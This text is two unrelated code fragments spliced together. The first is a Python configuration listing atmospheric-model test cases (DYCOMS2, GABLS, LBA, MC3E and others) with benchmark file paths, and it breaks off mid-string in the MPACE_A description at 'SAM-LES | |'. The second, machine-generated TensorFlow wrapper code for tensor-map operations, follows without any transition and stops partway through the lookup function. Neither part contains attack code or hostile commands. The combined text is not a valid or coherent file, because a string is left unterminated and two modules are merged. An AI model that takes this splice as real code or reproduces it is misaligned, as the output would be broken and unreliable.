'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf01_zt.nc',
'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf01_sfc.nc'},
'e3sm_file': { 'e3sm': e3sm_output_root + "/dycoms2_rf01.nc"},
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupWs]}
DYCOMS2_RF01_FIXED_SST = {'name': 'dycoms2_rf01_fixed_sst',
'description': "Copied from plotgen: Ran with a 5 min timestep and a 48-level grid",
'start_time': 2520, 'end_time': 2700,
'height_min_value': 0, 'height_max_value': 1200,
'blacklisted_vars': ['rtp3', 'Skrt_zt', 'Skthl_zt', 'rtpthvp', 'thlpthvp'],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/SAM6.6/DYCOMS_RF01_fixed_sst/DYCOMS_RF01_96x96x320_LES_fixed_sst.nc"},
'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf01_fixed_sst_zm.nc',
'zt': clubb_output_root + '/dycoms2_rf01_fixed_sst_zt.nc',
'sfc': clubb_output_root + '/dycoms2_rf01_fixed_sst_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase]}
DYCOMS2_RF02_DO = {'name': 'dycoms2_rf02_do',
'description': "",
'start_time': 301, 'end_time': 360,
'height_min_value': 0, 'height_max_value': 1200,
'blacklisted_vars': [],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/JULY_2017/DYCOMS_RF02_128x128x96_dr_nosed/DYCOMS_RF02_128x128x96_dr_nosed.nc"},
'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf02_do_zm.nc',
'zt': clubb_output_root + '/dycoms2_rf02_do_zt.nc',
'sfc': clubb_output_root + '/dycoms2_rf02_do_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_do_zm.nc',
'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_do_zt.nc',
'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_do_sfc.nc'},
'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf02_do_zm.nc',
'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf02_do_zt.nc',
'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf02_do_sfc.nc'},
'e3sm_file': None,
'cam_file': None,
'sam_file': {'sam': sam_output_root + "/DYCOMS_RF02_SAM_CLUBB.nc"},
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupCorrelations,
VariableGroupKKMP]}
DYCOMS2_RF02_DS = {'name': 'dycoms2_rf02_ds',
'description': "",
'start_time': 301, 'end_time': 360,
'height_min_value': 0, 'height_max_value': 1200,
'blacklisted_vars': [],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/JULY_2017/DYCOMS_RF02_128x128x96_dr_sed/DYCOMS_RF02_128x128x96_dr_sed.nc"},
'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf02_ds_zm.nc',
'zt': clubb_output_root + '/dycoms2_rf02_ds_zt.nc',
'sfc': clubb_output_root + '/dycoms2_rf02_ds_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_zm.nc',
'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_zt.nc',
'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_sfc.nc'},
'e3sm_file': {'e3sm': e3sm_output_root + "/dycoms2_rf02_ds.nc"},
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupCorrelations,
VariableGroupKKMP]}
DYCOMS2_RF02_ND = {'name': 'dycoms2_rf02_nd',
'description': "Copied from plotgen: ** Generated by doing a restart run after 7200 seconds. Note: "
"t = 0 corresponds to start time of the restart run, not the original run. ** ",
'start_time': 301, 'end_time': 360,
'height_min_value': 0, 'height_max_value': 1200,
'blacklisted_vars': ['wprrp', 'wpNrp', 'corr_w_rr_1', 'corr_w_Nr_1'],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/JULY_2017/DYCOMS_RF02_128x128x96_nodr_nosed/DYCOMS_RF02_128x128x96_nodr_nosed.nc"},
'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf02_nd_zm.nc',
'zt': clubb_output_root + '/dycoms2_rf02_nd_zt.nc',
'sfc': clubb_output_root + '/dycoms2_rf02_nd_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_nd_zm.nc',
'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_nd_zt.nc',
'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_nd_sfc.nc'},
'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf02_nd_zm.nc',
'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf02_nd_zt.nc',
'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf02_nd_sfc.nc'},
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupKKMP]}
DYCOMS2_RF02_DS_RESTART = {'name': 'dycoms2_rf02_ds_restart',
'description': "Copied from plotgen: ** Uniform, coarse verticle grid spacing of 40 m. **",
'start_time': 181, 'end_time': 240,
'height_min_value': 0, 'height_max_value': 1200,
'blacklisted_vars': [],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/JULY_2017/DYCOMS_RF02_128x128x96_dr_sed/DYCOMS_RF02_128x128x96_dr_sed.nc"},
'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf02_ds_restart_zm.nc',
'zt': clubb_output_root + '/dycoms2_rf02_ds_restart_zt.nc',
'sfc': clubb_output_root + '/dycoms2_rf02_ds_restart_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_ds_zm.nc',
'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_ds_zt.nc',
'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_ds_sfc.nc'},
'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_zm.nc',
'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_zt.nc',
'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_sfc.nc'},
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP,
VariableGroupCorrelations, VariableGroupKKMP]}
DYCOMS2_RF02_SO = {'name': 'dycoms2_rf02_so',
'description': "Copied from plotgen: " +
"** WRF-type stretched (unevenly spaced) grid (grid_type = 3) ** ",
'start_time': 301, 'end_time': 360,
'height_min_value': 0, 'height_max_value': 1200,
'blacklisted_vars': ['wprrp', 'wpNrp'],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/JULY_2017/DYCOMS_RF02_128x128x96_nodr_sed/DYCOMS_RF02_128x128x96_nodr_sed.nc"},
'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf02_so_zm.nc',
'zt': clubb_output_root + '/dycoms2_rf02_so_zt.nc',
'sfc': clubb_output_root + '/dycoms2_rf02_so_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_so_zm.nc',
'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_so_zt.nc',
'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_so_sfc.nc'},
'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf02_so_zm.nc',
'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf02_so_zt.nc',
'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf02_so_sfc.nc'},
'e3sm_file': None,
'cam_file': None,
'sam_file': {'sam': sam_output_root + "/DYCOMS_RF02_SAM_CLUBB.nc"},
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupKKMP]}
FIRE = {'name': 'fire',
'description': "",
'start_time': 61, 'end_time': 120,
'height_min_value': 0, 'height_max_value': 1000,
'blacklisted_vars': [],
'sam_benchmark_file': None,
'clubb_file': {'zm': clubb_output_root + '/fire_zm.nc',
'zt': clubb_output_root + '/fire_zt.nc',
'sfc': clubb_output_root + '/fire_sfc.nc'},
'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/fire_coamps_sm.nc",
'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/fire_coamps_sw.nc"},
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/fire_zm.nc',
'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/fire_zt.nc',
'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/fire_sfc.nc'},
'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + "/fire_zm.nc",
'zt': HOC_OUTPUT_ROOT + '/fire_zt.nc',
'sfc': HOC_OUTPUT_ROOT + '/fire_sfc.nc'},
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': {'zm': wrf_output_root + "/fire_zm_wrf.nc",
'zt': wrf_output_root + "/fire_zt_wrf.nc",
'sfc': wrf_output_root + "/fire_sfc_wrf.nc"
},
'var_groups': [VariableGroupBase, VariableGroupWs]}
# No budgets
GABLS2 = {'name': 'gabls2',
'description': "",
'start_time': 2101, 'end_time': 2160,
'height_min_value': 0, 'height_max_value': 2500,
'blacklisted_vars': ['tau_zm', 'radht', 'Skw_zt', 'Skrt_zt', 'Skthl_zt', 'corr_w_chi_1', 'corr_chi_eta_1',
'rcp2', 'thlpthvp', 'rtpthvp'],
'sam_benchmark_file': None,
'clubb_file': {'zm': clubb_output_root + '/gabls2_zm.nc',
'zt': clubb_output_root + '/gabls2_zt.nc',
'sfc': clubb_output_root + '/gabls2_sfc.nc'},
'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/gabls2_coamps_sm.nc",
'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/gabls2_coamps_sw.nc",
'sfc': COAMPS_BENCHMARK_OUTPUT_ROOT + "/gabls2_coamps_sfc.nc"},
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase]}
GABLS2_NIGHTLY = {'name': 'gabls2_nightly',
'description': "",
'start_time': 2101, 'end_time': 2160,
'height_min_value': 0, 'height_max_value': 2500,
'blacklisted_vars': [],
'sam_benchmark_file': None,
'clubb_file': {'zm': clubb_output_root + '/gabls2_zm.nc',
'zt': clubb_output_root + '/gabls2_zt.nc',
'sfc': clubb_output_root + '/gabls2_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupScalars]}
GABLS3 = {'name': 'gabls3',
'description': "",
'start_time': 1081, 'end_time': 1200,
'height_min_value': 0, 'height_max_value': 4970,
'blacklisted_vars': [],
'sam_benchmark_file': None,
'clubb_file': {'zm': clubb_output_root + '/gabls3_zm.nc',
'zt': clubb_output_root + '/gabls3_zt.nc',
'sfc': clubb_output_root + '/gabls3_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase]}
GABLS3_NIGHT = {'name': 'gabls3_night',
'description': "Copied from plotgen: Uses a 5-min timestep with 48 levels",
'start_time': 421, 'end_time': 480,
'height_min_value': 0, 'height_max_value': 800,
'blacklisted_vars': [],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/SAM6.6/GABLS3_NIGHT/gabls3_night.nc"},
'clubb_file': {'zm': clubb_output_root + '/gabls3_night_zm.nc',
'zt': clubb_output_root + '/gabls3_night_zt.nc',
'sfc': clubb_output_root + '/gabls3_night_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase]}
GATE_SHEAR_RLSF = {'name': 'gate_shear_rlsf',
'description': "",
'start_time': 540, 'end_time': 720,
'height_min_value': 0, 'height_max_value': 24000,
'blacklisted_vars': [],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/SAM6.6/GATE_shear_rlsf/GATE_shear_rlsf_64x64x128_1km_5s.nc"},
'clubb_file': None,
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': {'sam': sam_output_root + "/GATE_SAM_CLUBB.nc"},
'wrf_file': None,
'var_groups': [VariableGroupBase]}
# Use to plot IOP forced SAM runs
IOP = {'name': 'iop',
'description': "",
'start_time': 181, 'end_time': 1440,
'height_min_value': 0, 'height_max_value': 27750,
'blacklisted_vars': [],
'clubb_datasets': None,
'sam_benchmark_file': None,
'clubb_file': None,
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'var_groups': [VariableGroupBase, VariableGroupSamProfiles]}
JUN25_ALTOCU = {'name': 'jun25_altocu',
'description': "",
'start_time': 181, 'end_time': 240,
'height_min_value': 4825, 'height_max_value': 7290,
'blacklisted_vars': ['Ngm', 'wprrp', 'wpNrp'],
'sam_benchmark_file': None,
'clubb_file': {'zm': clubb_output_root + '/jun25_altocu_zm.nc',
'zt': clubb_output_root + '/jun25_altocu_zt.nc',
'sfc': clubb_output_root + '/jun25_altocu_sfc.nc'},
'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/jun25_altocu_qc3_coamps_sm.nc",
'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/jun25_altocu_qc3_coamps_sw.nc"},
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]}
LBA = {'name': 'lba',
'description': "Note that sam-plotgen plots up to a height of 16000 not 12000.\n"
"Copied from plotgen: SAM-LES uses Morrison microphysics " +
"and CLUBB standalone uses COAMPS microphysics",
'start_time': 300, 'end_time': 360,
'height_min_value': 0, 'height_max_value': 14000,
'blacklisted_vars': ['wprrp', 'wpNrp', 'Ngm'],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/JULY_2017/LBA_128kmx128kmx128_1km_Morrison/LBA_128kmx128kmx128_1km_Morrison.nc"},
'clubb_file': {'zm': clubb_output_root + '/lba_zm.nc',
'zt': clubb_output_root + '/lba_zt.nc',
'sfc': clubb_output_root + '/lba_sfc.nc',
'subcolumns': clubb_output_root + '/lba_nl_lh_sample_points_2D.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': {'sam': sam_output_root + "/LBA_SAM_CLUBB.nc"},
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP, VariableGroupWs]}
MC3E = {'name': 'mc3e',
'description': "",
'start_time': 60, 'end_time': 64800,
'height_min_value': 0, 'height_max_value': 18000,
'blacklisted_vars': ['rtp3', 'Skrt_zt', 'Skthl_zt', 'rtpthvp', 'thlpthvp', 'wprrp', 'wpNrp'],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/MC3E_r1359_128x128x128_1km_Morrison/MC3E.nc"},
'clubb_file': {'zm': clubb_output_root + '/mc3e_zm.nc',
'zt': clubb_output_root + '/mc3e_zt.nc',
'sfc': clubb_output_root + '/mc3e_sfc.nc',
'subcolumns': clubb_output_root + '/mc3e_nl_lh_sample_points_2D.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]}
MPACE_A = {'name': 'mpace_a',
'description': "Copied from plotgen: SAM-LES | |
"""Python wrappers around TensorFlow ops.
This file is MACHINE GENERATED! Do not edit.
Original C++ source file: map_ops.cc
"""
import collections
from tensorflow.python import pywrap_tfe as pywrap_tfe
from tensorflow.python.eager import context as _context
from tensorflow.python.eager import core as _core
from tensorflow.python.eager import execute as _execute
from tensorflow.python.framework import dtypes as _dtypes
from tensorflow.python.framework import op_def_registry as _op_def_registry
from tensorflow.python.framework import ops as _ops
from tensorflow.python.framework import op_def_library as _op_def_library
from tensorflow.python.util.deprecation import deprecated_endpoints
from tensorflow.python.util import dispatch as _dispatch
from tensorflow.python.util.tf_export import tf_export
from typing import TypeVar
@_dispatch.add_dispatch_list
@tf_export('empty_tensor_map')
def empty_tensor_map(name=None):
r"""Creates and returns an empty tensor map.
handle: an empty tensor map
Args:
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "EmptyTensorMap", name)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return empty_tensor_map_eager_fallback(
name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
empty_tensor_map, (), dict(name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"EmptyTensorMap", name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
empty_tensor_map, (), dict(name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ()
_inputs_flat = _op.inputs
_execute.record_gradient(
"EmptyTensorMap", _inputs_flat, _attrs, _result)
_result, = _result
return _result
EmptyTensorMap = tf_export("raw_ops.EmptyTensorMap")(_ops.to_raw_op(empty_tensor_map))
def empty_tensor_map_eager_fallback(name, ctx):
_inputs_flat = []
_attrs = None
_result = _execute.execute(b"EmptyTensorMap", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"EmptyTensorMap", _inputs_flat, _attrs, _result)
_result, = _result
return _result
@_dispatch.add_dispatch_list
@tf_export('tensor_map_erase')
def tensor_map_erase(input_handle, key, value_dtype, name=None):
r"""Returns a tensor map with item from given key erased.
input_handle: the original map
output_handle: the map with value from given key removed
key: the key of the value to be erased
Args:
input_handle: A `Tensor` of type `variant`.
key: A `Tensor`.
value_dtype: A `tf.DType`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "TensorMapErase", name, input_handle, key, "value_dtype",
value_dtype)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return tensor_map_erase_eager_fallback(
input_handle, key, value_dtype=value_dtype, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
tensor_map_erase, (), dict(input_handle=input_handle, key=key,
value_dtype=value_dtype, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
value_dtype = _execute.make_type(value_dtype, "value_dtype")
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"TensorMapErase", input_handle=input_handle, key=key,
value_dtype=value_dtype, name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
tensor_map_erase, (), dict(input_handle=input_handle, key=key,
value_dtype=value_dtype, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("key_dtype", _op._get_attr_type("key_dtype"), "value_dtype",
_op._get_attr_type("value_dtype"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"TensorMapErase", _inputs_flat, _attrs, _result)
_result, = _result
return _result
TensorMapErase = tf_export("raw_ops.TensorMapErase")(_ops.to_raw_op(tensor_map_erase))
def tensor_map_erase_eager_fallback(input_handle, key, value_dtype, name, ctx):
value_dtype = _execute.make_type(value_dtype, "value_dtype")
_attr_key_dtype, (key,) = _execute.args_to_matching_eager([key], ctx, [])
input_handle = _ops.convert_to_tensor(input_handle, _dtypes.variant)
_inputs_flat = [input_handle, key]
_attrs = ("key_dtype", _attr_key_dtype, "value_dtype", value_dtype)
_result = _execute.execute(b"TensorMapErase", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"TensorMapErase", _inputs_flat, _attrs, _result)
_result, = _result
return _result
@_dispatch.add_dispatch_list
@tf_export('tensor_map_has_key')
def tensor_map_has_key(input_handle, key, name=None):
r"""Returns whether the given key exists in the map.
input_handle: the input map
key: the key to check
has_key: whether the key is already in the map or not
Args:
input_handle: A `Tensor` of type `variant`.
key: A `Tensor`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `bool`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "TensorMapHasKey", name, input_handle, key)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return tensor_map_has_key_eager_fallback(
input_handle, key, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
tensor_map_has_key, (), dict(input_handle=input_handle, key=key,
name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"TensorMapHasKey", input_handle=input_handle, key=key, name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
tensor_map_has_key, (), dict(input_handle=input_handle, key=key,
name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("key_dtype", _op._get_attr_type("key_dtype"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"TensorMapHasKey", _inputs_flat, _attrs, _result)
_result, = _result
return _result
TensorMapHasKey = tf_export("raw_ops.TensorMapHasKey")(_ops.to_raw_op(tensor_map_has_key))
def tensor_map_has_key_eager_fallback(input_handle, key, name, ctx):
_attr_key_dtype, (key,) = _execute.args_to_matching_eager([key], ctx, [])
input_handle = _ops.convert_to_tensor(input_handle, _dtypes.variant)
_inputs_flat = [input_handle, key]
_attrs = ("key_dtype", _attr_key_dtype)
_result = _execute.execute(b"TensorMapHasKey", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"TensorMapHasKey", _inputs_flat, _attrs, _result)
_result, = _result
return _result
@_dispatch.add_dispatch_list
@tf_export('tensor_map_insert')
def tensor_map_insert(input_handle, key, value, name=None):
r"""Returns a map that is the 'input_handle' with the given key-value pair inserted.
input_handle: the original map
output_handle: the map with key and value inserted
key: the key to be inserted
value: the value to be inserted
Args:
input_handle: A `Tensor` of type `variant`.
key: A `Tensor`.
value: A `Tensor`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "TensorMapInsert", name, input_handle, key, value)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return tensor_map_insert_eager_fallback(
input_handle, key, value, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
tensor_map_insert, (), dict(input_handle=input_handle, key=key,
value=value, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"TensorMapInsert", input_handle=input_handle, key=key, value=value,
name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
tensor_map_insert, (), dict(input_handle=input_handle, key=key,
value=value, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("key_dtype", _op._get_attr_type("key_dtype"), "value_dtype",
_op._get_attr_type("value_dtype"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"TensorMapInsert", _inputs_flat, _attrs, _result)
_result, = _result
return _result
TensorMapInsert = tf_export("raw_ops.TensorMapInsert")(_ops.to_raw_op(tensor_map_insert))
def tensor_map_insert_eager_fallback(input_handle, key, value, name, ctx):
_attr_key_dtype, (key,) = _execute.args_to_matching_eager([key], ctx, [])
_attr_value_dtype, (value,) = _execute.args_to_matching_eager([value], ctx, [])
input_handle = _ops.convert_to_tensor(input_handle, _dtypes.variant)
_inputs_flat = [input_handle, key, value]
_attrs = ("key_dtype", _attr_key_dtype, "value_dtype", _attr_value_dtype)
_result = _execute.execute(b"TensorMapInsert", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"TensorMapInsert", _inputs_flat, _attrs, _result)
_result, = _result
return _result
@_dispatch.add_dispatch_list
@tf_export('tensor_map_lookup')
def tensor_map_lookup(input_handle, key, value_dtype, name=None):
r"""Returns the value from a given key in a tensor map.
input_handle: the input map
key: the key to be looked up
value: the value found from the given key
Args:
input_handle: A `Tensor` of type `variant`.
key: A `Tensor`.
value_dtype: A `tf.DType`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `value_dtype`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "TensorMapLookup", name, input_handle, key, "value_dtype",
value_dtype)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return tensor_map_lookup_eager_fallback(
input_handle, key, value_dtype=value_dtype, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
tensor_map_lookup, (), dict(input_handle=input_handle, key=key,
value_dtype=value_dtype, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
value_dtype = _execute.make_type(value_dtype, "value_dtype")
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"TensorMapLookup", input_handle=input_handle, key=key,
value_dtype=value_dtype, name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
tensor_map_lookup, (), dict(input_handle=input_handle, key=key,
value_dtype=value_dtype, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("key_dtype", _op._get_attr_type("key_dtype"), "value_dtype",
_op._get_attr_type("value_dtype"))
_inputs_flat = _op.inputs
